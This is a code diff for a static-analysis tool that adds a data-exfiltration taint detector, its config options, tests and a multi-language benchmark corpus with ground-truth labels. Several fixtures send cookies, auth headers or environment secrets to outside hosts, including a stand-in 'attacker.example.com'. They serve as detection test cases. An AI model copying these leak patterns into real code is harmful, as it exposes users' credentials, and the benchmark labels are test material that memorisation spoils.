crate::labels::SourceKind::CaughtException => 4, crate::labels::SourceKind::Unknown => 5, + crate::labels::SourceKind::Cookie => 6, + crate::labels::SourceKind::Header => 7, }; (span_start, span_end, kind_tag, o.node.index()) } diff --git a/src/taint/ssa_transfer/summary_extract.rs b/src/taint/ssa_transfer/summary_extract.rs index 17e92c3b..724bbea2 100644 --- a/src/taint/ssa_transfer/summary_extract.rs +++ b/src/taint/ssa_transfer/summary_extract.rs @@ -387,6 +387,15 @@ pub fn extract_ssa_func_summary_full( let mut param_to_return = Vec::new(); let mut param_to_sink: Vec<(usize, SmallVec<[SinkSite; 1]>)> = Vec::new(); let mut param_to_sink_param = Vec::new(); + // Per-param gate-filter cap masks lifted from inner multi-gate sink calls. + // Populated when the per-param probe reaches a sink whose CFG node carries + // [`crate::cfg::CallMeta::gate_filters`] with more than one entry, the + // multi-gate dispatch in `collect_block_events` has already cap-narrowed + // `event.sink_caps` to the matching gate's `label_caps`, so we record the + // pair as-is. Cross-file callers consume this list to preserve per-position + // cap attribution through wrapper functions like + // `fn forward(url, body) { fetch(url, {body}) }`. + let mut param_to_gate_filters: Vec<(usize, Cap)> = Vec::new(); // Per-param return-path decomposition. Populated only when the param // has ≥2 distinct return-block predicate hashes, a single-return-path // callee is already precise via `param_to_return`. @@ -541,6 +550,28 @@ pub fn extract_ssa_func_summary_full( for pos in extract_sink_arg_positions(event, ssa) { param_to_sink_param.push((idx, pos, event.sink_caps)); } + // Per-position gate-filter cap lifting. + // + // When the sink callee carries multiple gate filters (e.g. `fetch` + // is both an SSRF gate on the URL arg and a `DATA_EXFIL` gate on + // the body arg), the multi-gate dispatch has already filtered + // `event.sink_caps` down to the specific gate's `label_caps` for + // this probe. Recording `(idx, event.sink_caps)` preserves that + // narrowing across the function-summary boundary so a caller of + // the wrapper splits SSRF from DATA_EXFIL findings instead of + // joining them under a single union. + // + // Single-gate / no-gate sinks are skipped, the existing + // `param_to_sink` machinery already records those without + // per-position cap conflict. + if !event.sink_caps.is_empty() + && cfg[event.sink_node].call.gate_filters.len() > 1 + && !param_to_gate_filters + .iter() + .any(|&(i, c)| i == idx && c == event.sink_caps) + { + param_to_gate_filters.push((idx, event.sink_caps)); + } if event.sink_caps.is_empty() { continue; } @@ -641,6 +672,7 @@ pub fn extract_ssa_func_summary_full( param_to_sink, source_caps, param_to_sink_param, + param_to_gate_filters, param_container_to_return, param_to_container_store, return_type, diff --git a/src/taint/ssa_transfer/tests.rs b/src/taint/ssa_transfer/tests.rs index cd32ace2..930fc1ae 100644 --- a/src/taint/ssa_transfer/tests.rs +++ b/src/taint/ssa_transfer/tests.rs @@ -85,6 +85,8 @@ mod cross_file_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -832,6 +834,8 @@ mod primary_sink_location_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -963,6 +967,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); @@ -1053,6 +1059,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); let interner = SymbolInterner::new(); @@ -1112,6 +1120,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1298,6 +1308,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1423,6 +1435,8 @@ mod receiver_candidates_field_proj_tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1508,6 +1522,8 @@ mod receiver_candidates_field_proj_tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cands = super::super::receiver_candidates_for_type_lookup(SsaValue(0), Some(&body), Lang::Go); @@ -1550,6 +1566,7 @@ mod fanout_merge_tests { param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], } } @@ -1909,6 +1926,7 @@ mod field_write_tests { exception_edges: vec![], field_interner, field_writes, + synthetic_externals: HashSet::new(), }; (body, cache_id) } @@ -2206,6 +2224,7 @@ mod field_write_tests { m.insert(SsaValue(2), (SsaValue(0), cache_id)); m }, + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(0)); // v0 is Const → empty pt, the hook should not insert anything. @@ -2437,6 +2456,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; // Run pointer analysis first to confirm the result of `shift()` @@ -2575,6 +2596,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(7)); @@ -2715,6 +2738,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let interner = SymbolInterner::new(); @@ -2838,6 +2863,8 @@ mod cross_call_field_tests { exception_edges: vec![], field_interner, field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(7)); (body, cache_id, pf) @@ -3210,6 +3237,8 @@ mod field_taint_origin_cap_tests { exception_edges: vec![], field_interner, field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; (body, cache_id, cfg, n_proj) } @@ -3533,6 +3562,7 @@ mod pointer_lattice_worklist_tests { exception_edges: vec![], field_interner, field_writes, + synthetic_externals: HashSet::new(), }; let mut interner = SymbolInterner::new(); diff --git a/src/utils/config.rs b/src/utils/config.rs index 47876fc3..4c5dacd2 100644 --- a/src/utils/config.rs +++ b/src/utils/config.rs @@ -712,6 +712,10 @@ pub struct Config { pub output: OutputConfig, pub performance: PerformanceConfig, pub analysis: AnalysisRulesConfig, + /// Per-detector knobs ([detectors.*] in nyx.conf). Currently exposes + /// `[detectors.data_exfil]` for cross-boundary leak suppression. + #[serde(default)] + pub detectors: crate::utils::detector_options::DetectorOptions, pub server: ServerConfig, pub runs: RunsConfig, pub profiles: HashMap, @@ -1018,6 +1022,17 @@ pub(crate) fn merge_configs(mut default: Config, user: Config) -> Config { default.profiles.insert(name, profile); } + // --- DetectorOptions --- + // Wholesale replace: each `[detectors.*]` field uses #[serde(default)], + // so any omitted field already inherits the documented defaults during + // user-config deserialization. trusted_destinations is union-merged so + // the user adds to (rather than replaces) any future built-in defaults. + default.detectors.data_exfil.enabled = user.detectors.data_exfil.enabled; + extend_dedup( + &mut default.detectors.data_exfil.trusted_destinations, + user.detectors.data_exfil.trusted_destinations, + ); + // --- AnalysisRulesConfig --- // Engine options: wholesale replace. User's engine block is already // serde-merged with defaults (via #[serde(default)] per field), so any diff --git a/src/utils/detector_options.rs b/src/utils/detector_options.rs new file mode 100644 index 00000000..adb4d061 --- /dev/null +++ b/src/utils/detector_options.rs @@ -0,0 +1,129 @@ +//! Per-detector runtime options. +//! +//! Mirrors the install/current pattern in [`crate::utils::analysis_options`] +//! but for detector-class knobs that live under `[detectors.*]` in +//! `nyx.conf`. Engine code that wants to consult a detector option calls +//! [`current`]; the CLI installs a resolved value before the scan starts. +//! +//! The first knobs covered here are the [`Cap::DATA_EXFIL`][crate::labels::Cap::DATA_EXFIL] +//! suppression layers: +//! +//! * `enabled` — turn the cap off entirely per-project so legitimate +//! forwarding pipelines don't surface findings. +//! * `trusted_destinations` — destination URL prefixes that suppress the +//! cap when a sink's URL argument has a static prefix matching one of +//! them. Uses the same prefix-lock plumbing the SSRF suppression has. +//! +//! Defaults are conservative: detector enabled, no trusted destinations. + +use serde::{Deserialize, Serialize}; +use std::sync::RwLock; + +/// Options for the `Cap::DATA_EXFIL` suppression layers. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +#[serde(default)] +pub struct DataExfilDetectorOptions { + /// When `false`, the entire data-exfiltration detector class is + /// suppressed for the project. Sink-time filters drop + /// [`crate::labels::Cap::DATA_EXFIL`] from sink caps before event + /// emission, so no `taint-data-exfiltration` findings reach output. + pub enabled: bool, + /// URL prefixes treated as trusted destinations for outbound + /// requests. When a sink's destination argument has a proven static + /// prefix (from the abstract string domain or an inline literal) + /// that begins with one of these entries, the + /// [`crate::labels::Cap::DATA_EXFIL`] bit is dropped before event + /// emission. Mirrors the SSRF prefix-lock semantics. + pub trusted_destinations: Vec, +} + +impl Default for DataExfilDetectorOptions { + fn default() -> Self { + Self { + enabled: true, + trusted_destinations: Vec::new(), + } + } +} + +/// Top-level `[detectors]` block. +#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)] +#[serde(default)] +pub struct DetectorOptions { + pub data_exfil: DataExfilDetectorOptions, +} + +static RUNTIME: RwLock> = RwLock::new(None); + +/// Install the process-wide detector options. First-wins: subsequent calls +/// are a no-op and return `false`. The CLI calls this once per process at +/// scan start; library consumers that never install pick up +/// [`DetectorOptions::default`] via [`current`]. +pub fn install(opts: DetectorOptions) -> bool { + let mut guard = RUNTIME.write().expect("detector options RwLock poisoned"); + if guard.is_some() { + return false; + } + *guard = Some(opts); + true +} + +/// Replace the installed options unconditionally. Mirrors +/// [`crate::utils::analysis_options::reinstall`] for the server's +/// per-request resolution path. +pub fn reinstall(opts: DetectorOptions) { + *RUNTIME.write().expect("detector options RwLock poisoned") = Some(opts); +} + +/// Read the active options. Returns the installed runtime when present, +/// otherwise [`DetectorOptions::default`]. +pub fn current() -> DetectorOptions { + RUNTIME + .read() + .expect("detector options RwLock poisoned") + .clone() + .unwrap_or_default() +} + +/// Test helper: clear the installed runtime so a subsequent [`install`] +/// takes effect. Used only in tests that exercise different detector +/// configurations within the same process. +#[doc(hidden)] +pub fn _reset_for_tests() { + *RUNTIME.write().expect("detector options RwLock poisoned") = None; +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn defaults_match_documented() { + let o = DetectorOptions::default(); + assert!(o.data_exfil.enabled); + assert!(o.data_exfil.trusted_destinations.is_empty()); + } + + #[test] + fn toml_roundtrip() { + let opts = DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: false, + trusted_destinations: vec![ + "https://api.internal/".into(), + "https://telemetry.".into(), + ], + }, + }; + let s = toml::to_string(&opts).unwrap(); + let back: DetectorOptions = toml::from_str(&s).unwrap(); + assert_eq!(opts, back); + } + + #[test] + fn missing_section_uses_defaults() { + let toml_str = r#"# empty"#; + let cfg: DetectorOptions = toml::from_str(toml_str).unwrap(); + assert!(cfg.data_exfil.enabled); + } +} diff --git a/src/utils/mod.rs b/src/utils/mod.rs index efc2d147..d1c7396a 100644 --- a/src/utils/mod.rs +++ b/src/utils/mod.rs @@ -1,5 +1,6 @@ pub mod analysis_options; pub mod config; +pub mod detector_options; pub(crate) mod ext; pub mod path; pub mod project; @@ -8,4 +9,5 @@ pub(crate) mod snippet; pub use analysis_options::{AnalysisOptions, SymexOptions}; pub use config::Config; +pub use detector_options::{DataExfilDetectorOptions, DetectorOptions}; pub use project::{detect_frameworks, get_project_info}; diff --git a/tests/backwards_analysis_tests.rs b/tests/backwards_analysis_tests.rs index 90b805eb..04e5e04d 100644 --- a/tests/backwards_analysis_tests.rs +++ b/tests/backwards_analysis_tests.rs @@ -104,7 +104,33 @@ fn demand_driven_suite() { "no_source: no backwards-confirmed notes on a source-free fixture" ); - // ── 5. backwards OFF is a strict no-op: no confirmed notes. + // ── 5. data_exfil cap parity: the backwards engine must + // round-trip `Cap::DATA_EXFIL` exactly like SQL/CMD/SSRF. + // The forward engine fires `taint-data-exfiltration` + // on a cookie → fetch-body flow; backwards must reach + // the request.cookies source and confirm. + set_backwards(true); + let dir = fixture_path("demand_driven_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); + let exfil_confirmed = diags + .iter() + .filter(|d| { + d.id.starts_with("taint-data-exfiltration") + && has_backwards_note(d, "backwards-confirmed") + }) + .count(); + assert!( + exfil_confirmed >= 1, + "data_exfil: expected ≥1 backwards-confirmed taint-data-exfiltration finding; got diags: {}", + diags + .iter() + .map(|d| format!("{}:{}", d.id, d.line)) + .collect::>() + .join(", ") + ); + + // ── 6. backwards OFF is a strict no-op: no confirmed notes. set_backwards(false); let dir = fixture_path("demand_driven_reach_source"); let diags = scan_fixture_dir(&dir, AnalysisMode::Full); diff --git a/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c b/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c new file mode 100644 index 00000000..95d6f6eb --- /dev/null +++ b/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c @@ -0,0 +1,17 @@ +// DATA_EXFIL: env-config (Sensitive source) flows into the gated +// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The +// destination URL is set by a separate CURLOPT_URL setopt above; only +// the body-binding setopt fires DATA_EXFIL. +#include +#include + +void leak_env(void) { + char *token = getenv("AUTH_TOKEN"); + if (!token) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c b/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c new file mode 100644 index 00000000..e4e35dde --- /dev/null +++ b/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c @@ -0,0 +1,16 @@ +// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the +// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire. +// Sensitivity-gate strips the cap for Plain-tier sources. +#include +#include + +void forward_stdin(void) { + char input[256]; + if (!fgets(input, sizeof(input), stdin)) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go b/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go new file mode 100644 index 00000000..ed5c1215 --- /dev/null +++ b/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go @@ -0,0 +1,14 @@ +// DATA_EXFIL: a session cookie (Sensitive source) flows into the body +// of http.Post() at a hardcoded destination URL. +package fixture + +import ( + "net/http" + "strings" +) + +func leakCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go b/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go new file mode 100644 index 00000000..5ea2621b --- /dev/null +++ b/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go @@ -0,0 +1,15 @@ +// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a +// fixed-destination http.Post body must not fire. Sensitivity-gate +// strips the cap because the source is Plain-tier user input. +package fixture + +import ( + "net/http" + "strings" +) + +func forwardUserInput(r *http.Request) { + msg := r.FormValue("msg") + body := strings.NewReader(msg) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java b/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java new file mode 100644 index 00000000..ac695255 --- /dev/null +++ b/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java @@ -0,0 +1,23 @@ +// DATA_EXFIL: a Sensitive cookie source flows through +// BodyPublishers.ofString() into the request builder chain and finally +// into client.send() at a hardcoded destination URL. +import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; + +public class DataExfilJdkHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create("https://analytics.internal/track")) + .POST(BodyPublishers.ofString(session)) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java b/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java new file mode 100644 index 00000000..b6f4d82b --- /dev/null +++ b/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java @@ -0,0 +1,24 @@ +// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive +// source) is wrapped via RequestBody.create and bound to a request +// targeting a hardcoded URL. The chain-normalized newCall.execute +// matcher fires DATA_EXFIL on the body bind. +import javax.servlet.http.HttpSession; +import okhttp3.MediaType; +import okhttp3.OkHttpClient; +import okhttp3.Request; +import okhttp3.RequestBody; +import okhttp3.Response; + +public class DataExfilOkHttp { + public void leak(HttpSession session) throws Exception { + String token = (String) session.getAttribute("csrfToken"); + OkHttpClient client = new OkHttpClient(); + RequestBody body = RequestBody.create( + token, MediaType.parse("text/plain")); + Request req = new Request.Builder() + .url("https://analytics.internal/track") + .post(body) + .build(); + Response resp = client.newCall(req).execute(); + } +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js new file mode 100644 index 00000000..74341596 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at a fixed destination. SSRF must NOT fire +// because the URL is a hardcoded literal. +function leakBody(req) { + var payload = req.cookies.session; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js new file mode 100644 index 00000000..1a2e8058 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at an attacker-controlled host. SSRF stays +// silent (URL is a static literal); DATA_EXFIL fires. +function leakBodyExternal(req) { + var payload = req.cookies.session; + fetch('https://untrusted.example.com/intake', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js new file mode 100644 index 00000000..cc23e8b3 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js @@ -0,0 +1,9 @@ +// DATA_EXFIL: a request header (Sensitive-tier source) flows into the +// body of XMLHttpRequest.send(). The destination is a static literal, so +// SSRF must not fire. +function leakHeader(req) { + var auth = req.headers.authorization; + var xhr = new XMLHttpRequest(); + xhr.open('POST', '/upstream'); + xhr.send(auth); +} diff --git a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js new file mode 100644 index 00000000..4efb6bfb --- /dev/null +++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js @@ -0,0 +1,8 @@ +// DATA_EXFIL safe: routing a Sensitive cookie source through the named +// telemetry boundary `logEvent` is the developer's explicit decision to +// forward; the default Sanitizer(data_exfil) convention strips the cap. +function track(req) { + logEvent({ + user: req.cookies.session, + }); +} diff --git a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js new file mode 100644 index 00000000..63e975cd --- /dev/null +++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js @@ -0,0 +1,10 @@ +// DATA_EXFIL safe: plain user input echoed into a fetch() body must not +// fire. The user already controls req.body.message; surfacing it back +// into the outbound payload is not a cross-boundary disclosure. +function forwardUserMessage(req) { + var message = req.body.message; + fetch('/forward', { + method: 'POST', + body: message, + }); +} diff --git a/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py b/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py new file mode 100644 index 00000000..2abb33a6 --- /dev/null +++ b/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py @@ -0,0 +1,17 @@ +import os +from fastapi import FastAPI, Request +import httpx + +app = FastAPI() + + +# DATA_EXFIL: env-config secret flows into the json kwarg of an async +# httpx.AsyncClient().post() at a fixed destination URL. +@app.post('/sync-async') +async def sync_async(req: Request): + api_key = os.environ.get('UPSTREAM_API_KEY') + await httpx.AsyncClient().post( + 'https://upstream.internal/ingest', + json={'api_key': api_key}, + ) + return {'ok': True} diff --git a/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py b/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py new file mode 100644 index 00000000..214950ad --- /dev/null +++ b/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py @@ -0,0 +1,16 @@ +import os +import requests +from flask import Flask + +app = Flask(__name__) + + +# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the +# json kwarg of requests.post() at a fixed destination URL. +@app.route('/upload-config', methods=['POST']) +def upload_config(): + payload = {} + payload['api_key'] = os.environ.get('UPSTREAM_API_KEY') + payload['region'] = os.environ.get('UPSTREAM_REGION') + requests.post('https://api.internal/ingest', json=payload) + return 'ok' diff --git a/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py b/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py new file mode 100644 index 00000000..4052940d --- /dev/null +++ b/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py @@ -0,0 +1,14 @@ +import requests +from flask import Flask, request + +app = Flask(__name__) + + +# DATA_EXFIL safe: plain user input echoed into a fixed-destination +# requests.post body must not fire. Sensitivity-gate strips the cap +# because the source is Plain-tier (raw user input). +@app.route('/forward', methods=['POST']) +def forward(): + message = request.form.get('message') + requests.post('https://telemetry.internal/forward', json={'message': message}) + return 'ok' diff --git a/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb b/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb new file mode 100644 index 00000000..9692c121 --- /dev/null +++ b/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb @@ -0,0 +1,10 @@ +require 'net/http' +require 'uri' + +# DATA_EXFIL: a session cookie (Sensitive source) flows into the body +# of Net::HTTP.post at a fixed destination URL. +def forward_session(request) + sid = request.cookies[:auth_token] + uri = URI('https://analytics.internal/track') + Net::HTTP.post(uri, "session=#{sid}") +end diff --git a/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb b/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb new file mode 100644 index 00000000..f8c0fb33 --- /dev/null +++ b/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb @@ -0,0 +1,12 @@ +require 'rest-client' + +# DATA_EXFIL safe: plain user input echoed into a RestClient.post body +# at a fixed destination URL must not fire. Sensitivity-gate strips the +# cap for Plain-tier sources. +def forward_message(params) + message = params[:message] + RestClient.post( + 'https://telemetry.internal/forward', + { message: message }.to_json + ) +end diff --git a/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs b/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs new file mode 100644 index 00000000..c49e6634 --- /dev/null +++ b/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs @@ -0,0 +1,10 @@ +// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form() +// chain at a fixed destination URL. The form-encoded payload leaks the +// operator-bound secret across the outbound boundary. +fn exfil_form() { + let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap(); + let _ = reqwest::Client::new() + .post("https://attacker.example.com/collect") + .form(&secret) + .send(); +} diff --git a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts new file mode 100644 index 00000000..e568eaca --- /dev/null +++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at a fixed destination. SSRF must NOT fire +// because the URL is a hardcoded literal. +function leakBody(req: { cookies: { session: string } }): void { + const payload = req.cookies.session; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts new file mode 100644 index 00000000..03fa6ff8 --- /dev/null +++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts @@ -0,0 +1,10 @@ +// DATA_EXFIL: a request header (Sensitive-tier source) flows into the +// body of fetch() via the body field of the init object. Destination is +// a static literal so SSRF must not fire. +function leakHeader(req: { headers: { authorization: string } }): void { + const auth = req.headers.authorization; + fetch('https://analytics.internal/track', { + method: 'POST', + body: auth, + }); +} diff --git a/tests/benchmark/ground_truth.json b/tests/benchmark/ground_truth.json index a6483664..5f0cbc6f 100644 --- a/tests/benchmark/ground_truth.json +++ b/tests/benchmark/ground_truth.json @@ -3,7 +3,7 @@ "metadata": { "description": "Nyx benchmark ground truth", "created": "2026-03-20", - "corpus_size": 458 + "corpus_size": 477 }, "cases": [ { @@ -14474,6 +14474,576 @@ ], "disabled": false, "notes": "Vulnerable counterpart to py-auth-realrepo-005: same FastAPI route shape but no `dependencies=[Depends(...)]` keyword arg. Regression guard: the dependency-injection recogniser must not blanket-suppress every FastAPI route." + }, + { + "case_id": "js-data_exfil-001", + "file": "javascript/data_exfil/exfil_fetch_cookie_body.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie" + ], + "disabled": false, + "notes": "Cookie source flows into fetch body at hardcoded URL; DATA_EXFIL must fire and SSRF must not." + }, + { + "case_id": "js-data_exfil-002", + "file": "javascript/data_exfil/exfil_fetch_external_destination.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie", + "external-destination" + ], + "disabled": false, + "notes": "Cookie source flows into fetch body at attacker-controlled host; DATA_EXFIL fires, SSRF does not." + }, + { + "case_id": "js-data_exfil-003", + "file": "javascript/data_exfil/exfil_xhr_send_header.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [8, 8] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "xhr", + "header" + ], + "disabled": false, + "notes": "Authorization header source flows into XMLHttpRequest.send body at hardcoded URL." + }, + { + "case_id": "ts-data_exfil-001", + "file": "typescript/data_exfil/exfil_fetch_cookie_body.ts", + "language": "typescript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie" + ], + 